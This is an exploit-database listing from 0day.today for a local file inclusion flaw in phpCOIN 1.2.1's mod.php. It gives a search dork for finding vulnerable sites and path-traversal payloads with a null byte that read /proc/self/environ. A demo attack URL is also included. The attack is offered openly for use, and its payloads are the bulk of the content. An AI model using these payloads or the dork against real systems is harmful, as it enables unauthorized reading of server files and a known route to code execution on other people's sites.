[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability

Author
_mlk_
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11193
Category
web applications
Date add
07-03-2010
Platform
unsorted
==========================================================
phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability
==========================================================

# Exploit Title: phpCOIN 1.2.1 (mod.php) LFI vulnerability
# Author:  _mlk_  
# Software Link: null
# Version: phpCOIN 1.2.1
# Tested on: Linux*,*BSD and *windows
# Code : on paper
 
phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability

#############################################################################################################
#                                                                                                           #
#     [-] Information                                                                                       #
#                                                                                                           #
#  [+] Script :  phpCOIN 1.2.1                                                                              #
#                                                                                                           #
#  [+] Language :  PHP                                                                                      #
#                                                                                                           #
#  [+] Vendor :  http://www.phpcoin.com/                                                                    #
#                                                                                                           #
#  [+] Dork/String :  "Powered By phpCOIN v1.2.1" / "mod.php?mod=faq"                                       #
#                                                                                                           #
#  [+] Date :  02/03/10 (Brazil)                                                                            #
#                                                                                                           #
#############################################################################################################
#                                                                                                           #
#     [*] Example :                                                                                         #
#                                                                                                           #
#        http://localhost/[PATH]/mod.php?mod=[LFI]%00#
#        http://localhost/mod.php?mod=[LFI]%00#
#                                                                                                           #
#                                                                                                           #
#        ---------------------------------------------------------------------------------------            #
#                                                                                                           #
#                                                                                                           #
#     [*] Exploit :                                                                                         #
#                                                                                                           #
#          /../../../../../../proc/self/environ%00     #
#          /proc/self/environ%00                          #
#                                                                                                           #
#                                                                                                           #
#        ---------------------------------------------------------------------------------------            #
#                                                                                                           #
#                                                                                                           #
#     [*] Demo :                                                                                            #
#                                                                                                           #
#          http://server/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00              #
#                                                                                                           #
#                                                                                                           #
#############################################################################################################



#  0day.today [2024-11-15]  #